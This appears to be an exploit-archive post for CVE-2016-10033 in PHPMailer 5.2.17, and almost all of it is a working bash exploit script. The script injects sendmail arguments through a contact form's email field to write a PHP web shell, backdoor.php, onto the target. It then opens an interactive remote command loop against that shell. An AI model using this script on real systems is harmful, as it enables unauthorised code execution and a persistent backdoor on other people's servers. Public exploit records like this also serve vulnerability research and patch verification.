PHPMailer 5.2.17 Remote Code Execution
Posted on 27 December 2016
#!/bin/bash # CVE-2016-10033 exploit by opsxcq # https://github.com/opsxcq/exploit-CVE-2016-10033 echo '[+] CVE-2016-10033 exploit by opsxcq' if [ -z "$1" ] then echo '[-] Please inform an host as parameter' exit -1 fi host=$1 echo '[+] Exploiting '$host curl -sq 'http://'$host -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzXJpHSq4mNy35tHe' --data-binary $'------WebKitFormBoundaryzXJpHSq4mNy35tHe Content-Disposition: form-data; name="action" submit ------WebKitFormBoundaryzXJpHSq4mNy35tHe Content-Disposition: form-data; name="name" <?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?> ------WebKitFormBoundaryzXJpHSq4mNy35tHe Content-Disposition: form-data; name="email" vulnerables@ -OQueueDirectory=/tmp -X/www/backdoor.php ------WebKitFormBoundaryzXJpHSq4mNy35tHe Content-Disposition: form-data; name="message" Pwned ------WebKitFormBoundaryzXJpHSq4mNy35tHe-- ' >/dev/null && echo '[+] Target exploited, acessing shell at http://'$host'/backdoor.php' cmd='whoami' while [ "$cmd" != 'exit' ] do echo '[+] Running '$cmd curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep '|' | head -n 1 | cut -d '|' -f 2 | base64 -d echo read -p 'RemoteShell> ' cmd done echo '[+] Exiting'